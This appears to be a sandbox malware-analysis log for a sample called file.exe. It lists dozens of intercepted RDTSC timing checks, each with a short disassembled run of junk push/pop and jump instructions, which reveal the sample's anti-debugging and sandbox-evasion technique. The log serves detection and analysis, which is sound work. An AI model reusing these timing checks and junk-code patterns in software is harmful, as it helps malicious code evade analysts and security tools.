Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1EB2 second address: 9F1EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F10A7 second address: 9F10AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EEFD5 second address: 9EEFDF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1EB8 second address: 9F1EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDFF5 second address: 9EDFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E919 second address: A3E91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3F7D5 second address: A3F7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A2312h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44809 second address: A44813 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44813 second address: A44819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439BC second address: A439C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439C0 second address: A439C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439C6 second address: A439E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3612h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439E7 second address: A439EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A439EE second address: A43A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEE0EE360Fh 0x00000008 jg 00007FEEE0EE3606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43CE9 second address: A43CEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43CEE second address: A43CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44104 second address: A4410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4410A second address: A44136 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEE0EE3606h 0x00000008 jns 00007FEEE0EE3606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007FEEE0EE361Ch 0x00000016 jmp 00007FEEE0EE3616h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44136 second address: A4414C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4414C second address: A44150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A44150 second address: A4415C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4415C second address: A44160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A443E9 second address: A443EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A443EF second address: A44412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FEEE0EE3611h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4457E second address: A44599 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEE08A2306h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FEEE08A230Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50F83 second address: A50F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE3617h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A50F9E second address: A50FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FEEE08A2306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jne 00007FEEE08A2306h 0x00000013 jmp 00007FEEE08A2319h 0x00000018 pop edx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5112B second address: A5115F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEEE0EE3617h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5115F second address: A51165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51165 second address: A51169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51169 second address: A51187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEE08A2306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FEEE08A230Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A513FD second address: A5140E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5140E second address: A51414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51414 second address: A5141A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A515CA second address: A5160A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FEEE08A2312h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEEE08A230Fh 0x00000012 pushad 0x00000013 jmp 00007FEEE08A2311h 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A518D7 second address: A518DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A519EE second address: A519F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51B9D second address: A51BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51BA2 second address: A51BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51D0B second address: A51D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51D11 second address: A51D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEE08A230Eh 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A589FA second address: A589FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A589FE second address: A58A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5834E second address: A5836C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEEE0EE3606h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jnl 00007FEEE0EE360Ch 0x00000013 popad 0x00000014 pushad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5836C second address: A58386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEEE08A2313h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58386 second address: A5838A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A584F5 second address: A58521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A2319h 0x00000009 popad 0x0000000a jmp 00007FEEE08A230Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A58521 second address: A58526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B726 second address: A5B744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jg 00007FEEE08A2306h 0x00000011 jnp 00007FEEE08A2306h 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B744 second address: A5B753 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FEEE0EE3606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B753 second address: A5B760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B760 second address: A5B764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5B764 second address: A5B768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F5E second address: A67F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F62 second address: A67F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEE08A2316h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F7E second address: A67F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F88 second address: A67F8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F8E second address: A67F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67F97 second address: A67F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0289 second address: 9A02A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FEEE0EE3606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jbe 00007FEEE0EE3606h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84364 second address: A8436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8436A second address: A84374 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEEE0EE3606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82E72 second address: A82E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82E76 second address: A82E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FCB second address: A82FD5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FD5 second address: A82FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FDB second address: A82FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82FDF second address: A8300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEEE0EE3619h 0x00000011 jp 00007FEEE0EE3606h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8300A second address: A8300E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8300E second address: A83014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83014 second address: A8301E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8317A second address: A831A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jns 00007FEEE0EE3606h 0x0000000d jmp 00007FEEE0EE3616h 0x00000012 popad 0x00000013 pushad 0x00000014 js 00007FEEE0EE3606h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A831A7 second address: A831AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A832F6 second address: A832FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A832FC second address: A8330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEEE08A230Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8330C second address: A83314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83314 second address: A83335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEEE08A230Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87CD6 second address: A87CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D549 second address: A8D54D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D3C6 second address: A8D3DB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEEE0EE360Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FEEE0EE3606h 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9757D second address: A97585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92B6D second address: A92B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A92B73 second address: A92B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5638 second address: AA5654 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEEE0EE3612h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA5654 second address: AA565B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA52D4 second address: AA52D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA52D8 second address: AA52EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FEEE08A230Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACE90 second address: AACE9A instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEE0EE360Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC237 second address: AAC23E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC3A0 second address: AAC3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC3AA second address: AAC3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAC942 second address: AAC957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3611h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB13DF second address: AB13FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB14A1 second address: AB14AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FEEE0EE3606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB16A1 second address: AB16B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F5A second address: AB2F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE360Fh 0x00000009 jmp 00007FEEE0EE360Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE0EE3613h 0x00000015 jmp 00007FEEE0EE360Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F9A second address: AB2FA4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEE08A2306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51A3 second address: AB51AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51AD second address: AB51B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70348 second address: 4D7034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7034C second address: 4D70350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70350 second address: 4D70356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70356 second address: 4D7036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
